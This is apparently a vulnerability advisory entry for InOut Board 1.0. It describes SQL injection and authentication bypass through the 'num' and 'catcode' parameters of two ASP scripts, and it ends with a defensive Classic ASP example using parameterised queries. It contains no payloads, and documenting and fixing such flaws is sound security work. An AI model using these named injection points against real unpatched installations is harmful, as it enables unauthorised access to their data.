vendor: InOut Board
by: ajann
CVSS: 8,8 HIGH
SQL Injection and Login Bypass
CWE: 89, 522
Product Name: InOut Board
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
WYWO – InOut Board 1.0 Multiple Vulnerabilities
The application does not properly sanitize user-supplied input in the 'num' parameter of the 'phonemessage.asp' script and the 'catcode' parameter of the 'faqDsp.asp' script. An attacker can exploit this by sending malicious SQL queries to the application through these parameters. This can allow the attacker to bypass authentication and gain access to the application, or to access sensitive information from the database.
Mitigation:
Input validation should be used to ensure that user-supplied input is properly sanitized. Access to the application should be restricted to trusted users.
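
One way to apply this mitigation in Classic ASP, as an added example that is not InOut Board source code: allowlist-validate 'num' and 'catcode', then pass them as bound ADODB parameters instead of concatenating them into SQL. The table and column names, the validation patterns, the `Matches`/`Reject`/`NewCmd` helpers and `Application("ConnStr")` are assumptions, and both parameters are handled in one file only for brevity.

```vbscript
<%
Option Explicit
' Added example, not InOut Board source. Schema names, validation patterns
' and Application("ConnStr") are assumptions for illustration.
Const adCmdText = 1, adParamInput = 1, adInteger = 3, adVarChar = 200

' True only when the whole string matches the allowlist pattern.
Function Matches(raw, pattern)
    Dim re
    Set re = New RegExp
    re.Pattern = pattern
    Matches = re.Test(raw)
End Function

' Stop the request before any SQL is built.
Sub Reject()
    Response.Status = "400 Bad Request"
    Response.End
End Sub

' Build a text command whose values are supplied only through "?" markers.
Function NewCmd(conn, sql)
    Dim c
    Set c = Server.CreateObject("ADODB.Command")
    Set c.ActiveConnection = conn
    c.CommandType = adCmdText
    c.CommandText = sql
    Set NewCmd = c
End Function

Dim num, catcode, conn, cmd, rs
num = "" & Request.QueryString("num")          ' phonemessage.asp input
catcode = "" & Request.QueryString("catcode")  ' faqDsp.asp input
If Not Matches(num, "^[0-9]{1,9}$") Then Reject
If Not Matches(catcode, "^[A-Za-z0-9_-]{1,32}$") Then Reject

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnStr")

' 'num' is bound as an integer, so it can never change the statement text.
Set cmd = NewCmd(conn, "SELECT msg_body FROM phone_messages WHERE msg_id = ?")
cmd.Parameters.Append cmd.CreateParameter("num", adInteger, adParamInput, , CLng(num))
Set rs = cmd.Execute
If Not rs.EOF Then Response.Write Server.HTMLEncode("" & rs("msg_body"))
rs.Close

' 'catcode' is bound as a length-limited string.
Set cmd = NewCmd(conn, "SELECT question FROM faq WHERE cat_code = ?")
cmd.Parameters.Append cmd.CreateParameter("catcode", adVarChar, adParamInput, 32, catcode)
Set rs = cmd.Execute
If Not rs.EOF Then Response.Write Server.HTMLEncode("" & rs("question"))
rs.Close : conn.Close
%>
```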